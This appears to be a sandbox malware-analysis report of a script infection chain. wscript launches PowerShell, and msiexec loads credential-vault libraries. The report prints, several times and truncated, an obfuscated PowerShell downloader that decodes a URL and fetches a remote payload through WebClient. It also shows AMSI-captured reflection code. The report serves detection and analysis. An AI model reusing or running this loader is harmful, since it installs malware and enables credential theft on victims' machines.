Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\<.oeaccountC#z source: msiexec.exe, 0000000D.00000002.2629663448.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627803746.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627748759.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbq source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: msiexec.exe, 0000000D.00000002.2629463752.0000000002A4A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#Gearstngers Checkoffs Unappealingly", "", "", "0");
Source: Yara match File source: 00000004.00000002.2508605979.0000000009345000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2508157288.00000000080C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2486668247.000000000552C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Waukit)$gloBal:BOgsamleRe42 = [systEM.Text.ENcoDIng]::ascII.GEtstRiNg($smELTEosTE)$glObal:dIssimILErEndE=$BogsAmlERe42.sUbsTrIng($FluKiLY135,$DekoDeRe)<#Waddles Prolongering Learnabl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((diskettebger $Trykkefrihedens $Singularissen), (Flamlnders @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:converges = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Soddened13)), $Cirkelbevisets).DefineDynamicModule($cueing, $false).DefineType($Cellepora, $Riitta, [System.MulticastDelegate])$Indfds
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Waukit)$gloBal:BOgsamleRe42 = [systEM.Text.ENcoDIng]::ascII.GEtstRiNg($smELTEosTE)$glObal:dIssimILErEndE=$BogsAmlERe42.sUbsTrIng($FluKiLY135,$DekoDeRe)<#Waddles Prolongering Learnabl
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 10_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345079C5 push ebp; ret 2_2_00007FFD345079C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22331219 push esp; iretd 7_2_2233121A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22322806 push ecx; ret 7_2_22322819
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044693D push ecx; ret 10_2_0044694D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00451D54 push eax; ret 10_2_00451D61
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00451D34 push eax; ret 13_2_00451D41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00444E71 push ecx; ret 13_2_00444E81
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00414060 push eax; ret 14_2_00414074
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00414060 push eax; ret 14_2_0041409C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00414039 push ecx; ret 14_2_00414049
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 13_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
